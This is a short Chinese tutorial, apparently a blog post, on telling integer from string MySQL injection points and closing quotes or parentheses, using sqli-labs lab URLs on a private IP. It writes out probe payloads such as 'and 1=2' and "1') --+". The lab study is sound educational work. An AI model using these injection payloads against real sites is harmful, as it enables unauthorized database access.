Mysql注入 -- 注入类型

​钱真的很重要，以前总觉得太看重钱的人现实，但没钱，真的寸步难行。。。

----  网易云热评

 

一、整数注入

1、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=1，返回正常

2、访问http://192.168.139.129/sqli/Less-2/?id=2-1，返回正常

3、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=2，返回不正常

说明该注入点是整数注入

二、字符串注入

1、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=1，返回正常

2、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=2，返回正常

说明该注入点是字符串注入

三、单引号闭合

1、输入单引号，返回错误，错误信息为('1'' LIMIT 0,1)，1后面多了一个单引号，我们用(--+)屏蔽后面的单引号

http://192.168.139.129/sqli/Less-1/?id=1'

2、访问http://192.168.139.129/sqli/Less-1/?id=1' --+，返回正常

四、单引号+括号闭合

1、输入单引号，返回错误，错误信息为('1'') LIMIT 0,1)，1后面多了一个单引号和一般括号，我们用('))把前面的括号闭合，然后再用(--+)屏蔽后面的单引号和括号

http://192.168.139.129/sqli/Less-3/?id=1'

2、访问http://192.168.139.129/sqli/Less-3/?id=1') --+,返回正常

五、其他字符串闭合

1、双引号

2、加多重括号等等。。。

 

 

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧